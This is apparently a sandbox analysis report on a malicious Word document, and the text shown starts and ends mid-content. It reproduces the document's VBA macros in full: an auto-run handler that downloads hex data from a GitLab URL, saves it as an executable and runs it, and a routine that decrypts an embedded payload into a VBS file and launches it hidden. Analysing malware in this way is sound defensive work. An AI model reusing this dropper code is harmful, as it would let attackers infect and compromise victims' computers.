    part5 = "1fC3a1XE2RH92Y5dTbe2Mu9t0nQ9BHHbyhy4T32YyNV9MFdCB8pix3foKT/q0KGBfPGiQjDDJiWS4QUfrjaIbx1VhtihHaB3fpWRoVkGnjVTd3N5QVMckl6x0VzHMEq8pRw3yO5AxJqpRKK2CnJFZP"
    part6 = "4HtpvPyipWL2r2m3tEB2IfpBwLa6PLBeuSlXAeXis9riaM5diYNMS4iUcU74hZAwzV4mEJ9Jj0OoYM09jpok6R0BzkJ4TDr4j6W2i9Qra/zddsmbEqmUB3F28cj8+Q51M6Y8dBxNETxrnpttj7MRFz"
    part7 = "448jdoKx7yZwpPUSEllFI6aJExbW5OU0SeA3l0sPcwOrFVl2BcxGE4xNF3xMNXZv7ySzj1O5oQclakPNhwBXN+JhuXPCeA2PmTmM00/HmKpHziXUrbS74q+KqbVUOinDlQfToSi8d73W7jHWN/hmHH"
    part8 = "oU63mk5bUpOP079z2hntojd1sHY4dcRXRKvx0asiUXNG4UqCNH00yVyAKhvI8Dcd17kFfq/bde/LLF2GtlKM4iJ+nzMHMbs3IkXYTGr5/ODdJTgTq3XjeDHXIjYSj13l8nLQtx9m2S3TJukPyfeyOi"
    part9 = "7qtGErzbfMQhoOfpp2kuFxmLk+p+A+VjT5JVN16MldTldAy7QbVHqU8l0kTByBO+y4y2jN8HhP3Kk9TGwj4jlvoeOONTB6l3jD9V84H3nrQup6mpGv1w9KuH69xYBqnBeI+btZbNH9KfFE/ynL4Xsj"
    part10 = "Y8gnrSKktu4V47h17Q2iagtWR4L2m4pByPdrreHbsP0rY2Q5LkH37MUaHx9cmBMoUDNr2sIYZH3TA81b1kCYCKSg5g/2aHrTcIPXP2A9QR2OCstl/5c45+IgG2w4dLv0xtVvcD8Y/WuUAc3/hDcSXA"
    part11 = "c22K+jW908mHl1h/F1dKkbrFtdwRHriyiWKS9bTcjhwkV9WsHv7hGA2SR8Ek80N8VEsZKES3j0ZdvVgupiuE0DYqhPFQqjvZpn1sR4Acz88n0182sFl+8gSzop6GZKI3lftmOZM25QygdvILClX9vh"
    part12 = "ZcT+hu3SdvKLFQiGhIWunEmdtEJMSZH9pXzvmftAH8lhoZJ9Eq4tb/kWYDC7HufK+lesGow6lGx21uHMuvkfBD5LXVSHBC8k4gRIkTl/oS/U7oQKbbKg12ltdJusa1oRdQwspoCdebVGiuxqZSRMgP"
    part13 = "V1553L6FMJrS4FKUKxhYJVsSlrj9qVZZ/eCAPuscoB8dVOiqs7cyCWXUk4Qj5QxJms+tMVdugYoz5ozlXXiU6lzQJE8d4DrpHxkDV+0rLUY6RbZLUWwdEdHsJ1mHJooaQag4+CBG/bXk2J6KUdhxop"
    part14 = "ExrtYjBVs4zcHp8QWrz1A4MekTIXEDoar3wzHUibSEnItftTfLA1K0pdT1VzmXULgiJt2XtHxcI8p4UAEyMWJPGHRUclbNG8kzit6BXBoOFmh8tpQvhjUnwzp1U/pBq2+JFAzj9/8SVfOjFL1+mucA"
    part15 = "i1pSm2bvHJyoIfjCxh52RR51TIKot9mABF8F3sAQtVMmGEYvCQ9wuI6qE4NgqEEVhB0NdsrEzc19osiPUEKMMgTW86sBHKzrS5++r5mRX5RVtp1ZDjyq9YJC/e9UNpaLYUoVccJ2sVtdQu/RX2/N/S"
    part16 = "tWOepSU3zzJO3IC0LNDusBrP93U4TCouibRyPz4epM1SJQJjMx6K+xopwZo3BZ3pmbwoXFAO0fzHVW9/OkZdQnUBMWpZSAXB04I2uGA6d3CQrSiKe7EWHDBW9QnXbNuQy37TwUNlqjP/xhhJHsZA7P"
    part17 = "arP1NJmqk35mND6Fg88hP9rePCswSV166VP0fF/OYTPwVC9oXMPso94X2FAXEdUBuzFkxgOdSdGyah1WPEM5ZvTshQYXGcuf2cDr6nLNgUCVnFtVbQiNIGRb7wYTLzjvB89XoUs1YcnZXQmCKkmHCH"
    part18 = "GSH2dKTbANfW29PD7ZZK/dgGDVe3GAwwoqPiAOV74rw1hxrXad4TU1H+pEwHsxv0jnYXCdBI9iBV2P1pjMJWkXjT+N/oq6ZoM3hVRos7jaOwnvBI0163788stbN02N7VhgBzY/d0f+LtQVteFbgA0o"
    part19 = "HsS3ddDuf6EbxorfddYWNkOV3TvdwWNH3HpYmBq8GrjgxVoNDSw6E8eLoyqIXvqs1DxlLY/uHNorxP9iDGO2ZYMQ0qY3x6te3GbKJZKl3OekMFxDqkhqCE8IJSYTwSbAxNA2K6DHYsT/vDVm9OsrE+"
    part20 = "c2mPNjYheGhsI9AI48kBXTJcVdKNXyDdegX3K4O757DjlbkPTjmgpV0OWum/axEOdwfCBykOjb7WJw4LvLaZo08Hahku87InP6PbcV4DNRou1RgjHp0NZban9TeRc/3zAQQuzRcXMk2CfO83CTE+fn"
    part21 = "2VtluxczXmPsqd1boUbJTHJqxu8/43ICU1wduq4SM4YoQTBLYnhlBhn8vYBbW62jHOJqVtfj6xVksqFrCT71i1duHfhRGQLKlRTjnK6GS8Hy7IkuJjfTW4yuVwUAljPSFLJjzH+ZdfLQUnVyJ8Mjp5"
    part22 = "Yo4PaUOkPABOieg8Qne25eflW34sILpeymCECFYOk8w/veOnLjgAMEqow24oa7epvSaAQgjzkjkLCpPnJ+CxKvUbFkZWVAs6xkP76iD+6kxPBAglXqIG2HNCSGucUwUk9HUE0rij3PIjsyMiW9Xhrz"
    part23 = "7VOCW1hbYBBP2V3JGotCL6en9V3EvgCOm42brJhx6jIY8IzvDDUC+EnfnJmUUfFfDgZyVV4Yi1L+m4tdQhjbzVcEz0PyGGjcmk8o9FRd4mfVYPEmN3NQBxP3xEK4hx8uPXUA4aGj+8CXfWSvrzeLNg"
    part24 = "VqtTEkJLtTukhKEe977DegbZo9Q132SqvT6kjAzJ+UCcHjDDctQFmdMF5PfFle"
    Dim encryptedText As String
    encryptedText = part1 & part2 & part3 & part4 & part5 & part6 & part7 & part8 & part9 & part10 & part11 & part12 & part13 & part14 & part15 & part16 & part17 & part18 & part19 & part20 & part21 & part22 & part23 & part24
    decryptedText = AesDecryptString(encryptedText, key)    ' Gi?i m

    ' Kch thu?c c?a m?i ph?n
    chunkSize = 3000  ' Kch thu?c m?i ph?n
    Dim outputFilePath As String
    ' Luu ton b? n?i dung gi?i m vo t?p VBS
    vbsFilePath = Environ("USERPROFILE") & "\Documents\WindowServices.vbs"

    ' Ghi t?ng ph?n ra t?p
    Open vbsFilePath For Output As #1
    For i = 1 To Len(decryptedText) Step chunkSize
        partText = Mid(decryptedText, i, chunkSize)
        Print #1, partText  ' Ghi t?ng ph?n vo t?p
    Next i
    Close #1

Dim shell As Object
Set shell = CreateObject("Shell.Application")

' Ch?y file VBS ? ch? d? ?n (n?u h? tr?)
shell.ShellExecute vbsFilePath, "", "", "open", 0

    

End Sub

Private Sub Class_Initialize()
    
End Sub

VBA File Name: ksksksksksksks.cls, Stream Size: 1441

General
Stream Path:	Macros/VBA/ksksksksksksks
VBA File Name:	ksksksksksksks.cls
Stream Size:	1441
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . D . . . . . . . . . . . . . . . . . . . . . . . t H N B O _ . c . O - " 8 . . . . . . . . . . . . . . . . . . . . . . q . G B . , . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . P . . . . . S " . . . . S . . . . . S " . . . . . < 0 . . . . . . < 8 . . . . . . < . . . . . . < ( . . . . . . < . . . . . . . . . . (
Data Raw:	01 16 03 00 00 00 01 00 00 b4 03 00 00 e4 00 00 00 12 02 00 00 ff ff ff ff bb 03 00 00 8f 04 00 00 00 00 00 00 01 00 00 00 d4 44 a8 d5 00 00 ff ff a3 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 07 b9 09 74 48 d4 4e 42 be 96 d1 4f be 5f 8a ea 92 8d 63 ac a2 17 e0 4f 8b 2d a0 a4 c2 22 38 09 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code

Attribute VB_Name = "ksksksksksksks"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
    Application.OnTime Now + TimeValue("00:00:01"), "DownloadAndRunEXE"
End Sub

Streams

Stream Path: \x1CompObj, File Type: data, Stream Size: 114

General
Stream Path:	\x1CompObj
CLSID:
File Type:	data
Stream Size:	114
Entropy:	4.235956365095031
Base64 Encoded:	True
Data ASCII:	. . . . . . . . . . . . . . . . . . . . F . . . M i c r o s o f t W o r d 9 7 - 2 0 0 3 D o c u m e n t . . . . . M S W o r d D o c . . . . . W o r d . D o c u m e n t . 8 . 9 q . . . . . . . . . . . .
Data Raw:	01 00 fe ff 03 0a 00 00 ff ff ff ff 06 09 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 20 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 57 6f 72 64 20 39 37 2d 32 30 30 33 20 44 6f 63 75 6d 65 6e 74 00 0a 00 00 00 4d 53 57 6f 72 64 44 6f 63 00 10 00 00 00 57 6f 72 64 2e 44 6f 63 75 6d 65 6e 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00

Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096

General
Stream Path:	\x5DocumentSummaryInformation
CLSID:
File Type:	data
Stream Size:	4096
Entropy:	0.2427468033329246
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . h . . . . . . . p . . . . . . . \| . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . T i t l e . . . . . .
Data Raw:	fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 e8 00 00 00 0c 00 00 00 01 00 00 00 68 00 00 00 0f 00 00 00 70 00 00 00 05 00 00 00 7c 00 00 00 06 00 00 00 84 00 00 00 11 00 00 00 8c 00 00 00 17 00 00 00 94 00 00 00 0b 00 00 00 9c 00 00 00 10 00 00 00 a4 00 00 00 13 00 00 00 ac 00 00 00

Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096

General
Stream Path:	\x5SummaryInformation
CLSID:
File Type:	data
Stream Size:	4096
Entropy:	0.45444014931703014
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . h . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . $ . . . . . . . 0 . . . . . . . < . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . A D M I N . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . N o r m a
Data Raw:	fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 68 01 00 00 11 00 00 00 01 00 00 00 90 00 00 00 02 00 00 00 98 00 00 00 03 00 00 00 a4 00 00 00 04 00 00 00 b0 00 00 00 05 00 00 00 c0 00 00 00 06 00 00 00 cc 00 00 00 07 00 00 00 d8 00 00 00 08 00 00 00 e8 00 00 00 09 00 00 00 f8 00 00 00

Stream Path: 1Table, File Type: data, Stream Size: 7563

General
Stream Path:	1Table
CLSID:
File Type:	data
Stream Size:	7563
Entropy:	5.842344693433376
Base64 Encoded:	True
Data ASCII:	. . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . > . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6
Data Raw:	1e 06 0f 00 12 00 01 00 78 01 0f 00 07 00 03 00 03 00 03 00 00 00 04 00 08 00 00 00 98 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00

Stream Path: Macros/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 598

General
Stream Path:	Macros/PROJECT
CLSID:
File Type:	ASCII text, with CRLF line terminators
Stream Size:	598
Entropy:	5.2911106056391715
Base64 Encoded:	True
Data ASCII:	I D = " { 6 A C 5 3 0 6 E - 9 2 8 F - 4 D 3 0 - A C 3 1 - 2 8 1 A D 3 0 6 9 D D 1 } " . . D o c u m e n t = k s k s k s k s k s k s k s / & H 0 0 0 0 0 0 0 0 . . M o d u l e = M o d u l e 3 . . C l a s s = V i e w S e s s i o n . . M o d u l e = M o d u l e 1 . . M o d u l e = M o d u l e 2 . . H e l p F i l e = " 1 0 0 7 4 6 3 5 0 " . . N a m e = " P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " D 5 D 7 0 5 2 2 0 F A 3 1
Data Raw:	49 44 3d 22 7b 36 41 43 35 33 30 36 45 2d 39 32 38 46 2d 34 44 33 30 2d 41 43 33 31 2d 32 38 31 41 44 33 30 36 39 44 44 31 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 6b 73 6b 73 6b 73 6b 73 6b 73 6b 73 6b 73 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 4d 6f 64 75 6c 65 3d 4d 6f 64 75 6c 65 33 0d 0a 43 6c 61 73 73 3d 56 69 65 77 53 65 73 73 69 6f 6e 0d 0a 4d 6f 64 75 6c 65 3d 4d 6f 64 75 6c

Stream Path: Macros/PROJECTwm, File Type: data, Stream Size: 155

General
Stream Path:	Macros/PROJECTwm
CLSID:
File Type:	data
Stream Size:	155
Entropy:	3.107165469264921
Base64 Encoded:	False
Data ASCII:	k s k s k s k s k s k s k s . k . s . k . s . k . s . k . s . k . s . k . s . k . s . . . M o d u l e 3 . M . o . d . u . l . e . 3 . . . V i e w S e s s i o n . V . i . e . w . S . e . s . s . i . o . n . . . M o d u l e 1 . M . o . d . u . l . e . 1 . . . M o d u l e 2 . M . o . d . u . l . e . 2 . . . . .
Data Raw:	6b 73 6b 73 6b 73 6b 73 6b 73 6b 73 6b 73 00 6b 00 73 00 6b 00 73 00 6b 00 73 00 6b 00 73 00 6b 00 73 00 6b 00 73 00 6b 00 73 00 00 00 4d 6f 64 75 6c 65 33 00 4d 00 6f 00 64 00 75 00 6c 00 65 00 33 00 00 00 56 69 65 77 53 65 73 73 69 6f 6e 00 56 00 69 00 65 00 77 00 53 00 65 00 73 00 73 00 69 00 6f 00 6e 00 00 00 4d 6f 64 75 6c 65 31 00 4d 00 6f 00 64 00 75 00 6c 00 65 00 31 00 00

Stream Path: Macros/VBA/_VBA_PROJECT, File Type: data, Stream Size: 8089

General
Stream Path:	Macros/VBA/_VBA_PROJECT
CLSID:
File Type:	data
Stream Size:	8089
Entropy:	5.662084075475776
Base64 Encoded:	True
Data ASCII:	a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 2 . # . 9 . # . C . : . \\ . P . r . o . g . r . a . m . . F . i . l . e . s . \\ . C . o . m . m . o . n . . F . i . l . e . s . \\ . M . i . c . r . o . s . o . f . t . . S . h . a . r . e . d . \\ . V . B . A . \\ . V . B . A . 7 . . . 1 . \\ . V . B . E . 7 . . . D .
Data Raw:	cc 61 b5 00 00 03 00 ff 09 04 00 00 09 04 00 00 e4 04 03 00 00 00 00 00 00 00 00 00 01 00 05 00 02 00 20 01 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 32 00 23 00

Stream Path: Macros/VBA/dir, File Type: data, Stream Size: 653

General
Stream Path:	Macros/VBA/dir
CLSID:
File Type:	data
Stream Size:	653
Entropy:	6.421648833038081
Base64 Encoded:	True
Data ASCII:	. . . . . . . . . 0 * . . . . p . . H . . . . d . . . . . . . P r o j e c t . Q . ( . . @ . . . . ? . . = . . . . . . < . . . . . . . r i . . . . r < . . . . . . . s t d o l e > . . . s . t . d . o . l . e . . . h . . . ^ . . * \\ G { 0 0 0 2 0 4 3 0 - . . . . . C . . . . . . 0 0 4 . 6 } # 2 . 0 # 0 . # C : \\ W i n d . o w s \\ S y s t e m 3 2 \\ . e 2 . . t l b # O L E . A u t o m a t i . o n . 0 . . E N o r ( m a l E N C r . m . a F . . . b . . * \\ C . . . . 3 . m . . ! O f f i " c g O . f . i . * c g
Data Raw:	01 89 b2 80 01 00 04 00 00 00 03 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e4 04 04 00 07 00 1c 00 50 72 6f 6a 65 63 74 05 51 00 28 00 00 40 02 14 06 02 a8 3f b5 00 00 3d 06 12 07 02 12 01 3c 08 06 12 02 09 02 12 8c da 72 69 0a 00 8a 0c 02 72 3c 02 0a 16 00 06 00 07 80 73 74 64 6f 6c 65 3e 02 19 00 73 00 74 00 64 00 6f 00 80 6c 00 65 00 0d 00 68 00 1d 02 5e 00 03 2a 5c

Stream Path: WordDocument, File Type: data, Stream Size: 4096

General
Stream Path:	WordDocument
CLSID:
File Type:	data
Stream Size:	4096
Entropy:	1.0834551557408363
Base64 Encoded:	False
Data ASCII:	. = . . . . . . . . . . . . . . . . . . . . . * . . . . . b j b j . . . . . . . . . . . . . . . . . . . . . . . . . . . . L h L h . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . F . . . . . . . F . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ! . . . t . . . . . . . . . .
Data Raw:	ec a5 c1 00 3d 00 09 04 00 00 f0 12 bf 00 00 00 00 00 00 10 00 00 00 00 00 08 00 00 2a 08 00 00 0e 00 62 6a 62 6a 2e 97 2e 97 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 09 04 16 00 2e 0e 00 00 4c fd cd 68 4c fd cd 68 15 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00

Target ID:	0
Start time:	09:30:56
Start date:	14/01/2025
Path:	C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /Automation -Embedding
Imagebase:	0x7ff6b59d0000
File size:	1'637'952 bytes
MD5 hash:	A9F0EC89897AC6C878D217DFB64CA752
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	14
Start time:	09:33:47
Start date:	14/01/2025
Path:	C:\Windows\System32\SystemSettingsBroker.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\SystemSettingsBroker.exe -Embedding
Imagebase:	0x7ff735a00000
File size:	220'536 bytes
MD5 hash:	899E65893CDEE7F9022DC9B583F94F0F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	16
Start time:	09:33:47
Start date:	14/01/2025
Path:	C:\Windows\System32\drivers\rassstp.sys
Wow64 process (32bit):	false
Commandline:
Imagebase:	0x7ff74b1a0000
File size:	122'880 bytes
MD5 hash:	6931A955F0697B3A675E3F1B1B058D96
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	17
Start time:	09:33:47
Start date:	14/01/2025
Path:	C:\Windows\System32\drivers\ndproxy.sys
Wow64 process (32bit):
Commandline:
Imagebase:
File size:	122'880 bytes
MD5 hash:	8236B9B87FCB51A225A5B69A23C6DCBA
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	22
Start time:	09:33:48
Start date:	14/01/2025
Path:	C:\Windows\System32\drivers\agilevpn.sys
Wow64 process (32bit):
Commandline:
Imagebase:
File size:	147'456 bytes
MD5 hash:	9470BBB777C18559249CB627755AE05A
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	23
Start time:	09:33:48
Start date:	14/01/2025
Path:	C:\Windows\System32\drivers\rasl2tp.sys
Wow64 process (32bit):
Commandline:
Imagebase:
File size:	139'264 bytes
MD5 hash:	31026F5886DD4B3507C26173933722BE
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	24
Start time:	09:33:48
Start date:	14/01/2025
Path:	C:\Windows\System32\drivers\raspptp.sys
Wow64 process (32bit):
Commandline:
Imagebase:
File size:	139'264 bytes
MD5 hash:	DD210C0462E41139AA1E06AE8C82C6BA
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	25
Start time:	09:33:48
Start date:	14/01/2025
Path:	C:\Windows\System32\drivers\raspppoe.sys
Wow64 process (32bit):
Commandline:
Imagebase:
File size:	122'880 bytes
MD5 hash:	A664DB4B37AB3904F14242E7882469FB
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	26
Start time:	09:33:48
Start date:	14/01/2025
Path:	C:\Windows\System32\drivers\ndistapi.sys
Wow64 process (32bit):
Commandline:
Imagebase:
File size:	65'536 bytes
MD5 hash:	F2EB1438623A09E1659E5B5706D15B38
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	27
Start time:	09:33:48
Start date:	14/01/2025
Path:	C:\Windows\System32\drivers\ndiswan.sys
Wow64 process (32bit):
Commandline:
Imagebase:
File size:	237'568 bytes
MD5 hash:	E63671FE12F81F56D79B1CC58305AD64
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	31
Start time:	09:38:49
Start date:	14/01/2025
Path:	C:\Windows\System32\smartscreen.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\smartscreen.exe -Embedding
Imagebase:	0x7ff7f7f70000
File size:	630'784 bytes
MD5 hash:	D447511B1A99D72F21DC1A148F1A32A3
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

VBA Code

Call Graph

Graph

Entrypoint
Decryption Function
Executed
Not Executed
Show Help

Module: Module1

Declaration

Line	Content
1	Attribute VB_Name = "Module1"

Non-Executed Functions

Subroutine
CallTestAESAPIs: 6, Strings: 0, Number of lines: 4, Relevance: 7.504

APIs	Meta Information
Part of subcall function ikwiwiejs_19293_Ade@ViewSession: Environ
Part of subcall function ikwiwiejs_19293_Ade@ViewSession: Open
Part of subcall function ikwiwiejs_19293_Ade@ViewSession: Len
Part of subcall function ikwiwiejs_19293_Ade@ViewSession: Mid
Part of subcall function ikwiwiejs_19293_Ade@ViewSession: CreateObject
Part of subcall function ikwiwiejs_19293_Ade@ViewSession: ShellExecute

Line	Instruction	Meta Information
2	Public Sub CallTestAES()
3	Dim kakensooe as New ViewSession
4	kakensooe.ikwiwiejs_19293_Ade
6	End Sub

Module: Module2

Declaration

Line	Content
1	Attribute VB_Name = "Module2"
2	Option Explicit

Non-Executed Functions

Subroutine
DownloadAndRunEXEAPIs: 23, Strings: 17, Number of lines: 28, Relevance: 71.778

APIs	Meta Information
Part of subcall function GetDataFromURL@Module2: CreateObject
Part of subcall function GetDataFromURL@Module2: Open
Part of subcall function GetDataFromURL@Module2: Send
Part of subcall function GetDataFromURL@Module2: Status
Part of subcall function GetDataFromURL@Module2: responseText
MsgBox
vbCritical
Part of subcall function HexToBinary@Module2: Len
Part of subcall function HexToBinary@Module2: CByte
Part of subcall function HexToBinary@Module2: Mid
Environ
FreeFile
Open
LBound
UBound
Len
Dir
CreateObject
Run
MsgBox
vbInformation
MsgBox
vbCritical

Strings	Decrypted Strings
"https://gitlab.com/app8490744/updatesa/-/raw/main/up"
""""
"Kh\xf4ng t?i du?c d? li?u t? URL."
"L?i"
"Kh\xf4ng t?i du?c d? li?u t? URL."
"L?i"
"USERPROFILE"
""""
"File EXE d\xe3 du?c t?i v\xe0 ch?y th\xe0nh c\xf4ng!"
"Th\xe0nh c\xf4ng"
"WScript.Shell"
"WScript.Shell"
""""
"File EXE d\xe3 du?c t?i v\xe0 ch?y th\xe0nh c\xf4ng!"
"Th\xe0nh c\xf4ng"
"Kh\xf4ng th? t?o file EXE."
"L?i"

Line	Instruction	Meta Information
40	Sub DownloadAndRunEXE()
41	Dim hexData as String
42	Dim binaryData() as Byte
43	Dim savePath as String
44	Dim fileNum as Integer
45	Dim i as Long
48	hexData = GetDataFromURL("https://gitlab.com/app8490744/updatesa/-/raw/main/up")
50	If hexData = "" Then
51	MsgBox "Kh\xf4ng t?i du?c d? li?u t? URL.", vbCritical, "L?i"	MsgBox vbCritical
52	Exit Sub
53	Endif
56	binaryData = HexToBinary(hexData)
59	savePath = Environ("USERPROFILE") & "\Documents\example.exe"	Environ
60	fileNum = FreeFile	FreeFile
62	Open savePath For Binary As # fileNum	Open
63	For i = LBound(binaryData) To UBound(binaryData)	LBound UBound
64	Put # fileNum, , binaryData(i)
65	Next i	LBound UBound
66	Close # fileNum
69	If Len(Dir(savePath)) > 0 Then	Len Dir
70	Dim shell as Object
71	Set shell = CreateObject("WScript.Shell")	CreateObject
74	shell.Run """" & savePath & """", 1, False	Run
75	MsgBox "File EXE d\xe3 du?c t?i v\xe0 ch?y th\xe0nh c\xf4ng!", vbInformation, "Th\xe0nh c\xf4ng"	MsgBox vbInformation
76	Else
77	MsgBox "Kh\xf4ng th? t?o file EXE.", vbCritical, "L?i"	MsgBox vbCritical
78	Endif
79	End Sub

Function
GetDataFromURLAPIs: 5, Strings: 3, Number of lines: 14, Relevance: 15.764

APIs	Meta Information
CreateObject
Open
Send
Status
responseText

Strings	Decrypted Strings
"MSXML2.XMLHTTP"
"GET"
""""

Line	Instruction	Meta Information
21	Function GetDataFromURL(url as String) as String
22	Dim http as Object
23	Set http = CreateObject("MSXML2.XMLHTTP")	CreateObject
25	On Error Resume Next
26	http.Open "GET", url, False	Open
27	http.Send	Send
29	If http.Status = 200 Then	Status
30	GetDataFromURL = http.responseText	responseText
31	Else
32	GetDataFromURL = ""
33	Endif
35	On Error Goto 0
36	Set http = Nothing
37	End Function

Function
HexToBinaryAPIs: 3, Strings: 2, Number of lines: 11, Relevance: 7.511

APIs	Meta Information
Len
CByte
Mid

Strings	Decrypted Strings
"&H"
"&H"

Line	Instruction	Meta Information
5	Function HexToBinary(hexString as String) as Byte()
6	Dim i as Long
7	Dim length as Long
8	Dim byteArray() as Byte
10	length = Len(hexString) \ 2	Len
11	Redim byteArray(length - 1)
13	For i = 0 To length - 1
14	byteArray(i) = CByte("&H" & Mid(hexString, i * 2 + 1, 2))	CByte Mid
15	Next i
17	HexToBinary = byteArray
18	End Function

Module: Module3

Declaration

Line	Content
1	Attribute VB_Name = "Module3"
3	Option Explicit
4	DefObj A-Z
12	#if Win64 then
13	Private Const PTR_SIZE as Long = 8
14	#else
15	Private Const PTR_SIZE as Long = 4
16	#endif
18	#if HasPtrSafe then
19	Private Declare PtrSafe Sub CopyMemory Lib "kernel32" Alias "RtlMoveMemory"(lpvDest as Any, lpvSource as Any, ByVal cbCopy as LongPtr)
